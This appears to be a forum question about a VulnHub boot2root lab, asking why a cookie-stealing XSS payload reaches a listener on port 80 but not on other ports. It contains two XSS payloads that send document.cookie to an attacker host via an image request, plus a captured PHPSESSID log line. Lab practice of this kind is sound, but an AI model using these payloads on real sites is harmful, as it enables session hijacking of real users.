I am currently doing a boot2root VulnHub machine and I have found an XSS entry point to steal admin cookies.
The strange thing is that if I run my SimpleHTTPServer on port 80 then the following payload triggers
<script>document.write('<img src="http://192.168.1.130/'+document.cookie+'" width=0 height=0 border=0 />');</script>
And I get the cookie like this
192.168.1.14 - - [13/Sep/2020 09:23:36] "GET /PHPSESSID=m18d10ghina3pbtlhn5sttrm8o HTTP/1.1" 404 -
But if I run my SimpleHTTPServer let’s say on port 4242 or any other port (I have tried a handful), the following payload does not trigger
<script>document.write('<img src="http://192.168.1.130:4242/'+document.cookie+'" width=0 height=0 border=0 />');</script>
Or at least I don’t see anything.
Please note that the boot2root VM seems to call every minute without fail.
I don’t know why this is happening. Does SimpleHTTPServer only work on port 80? It could be as simple as that, I guess, but I see examples on the internet with other ports being used so I doubt this is the case.
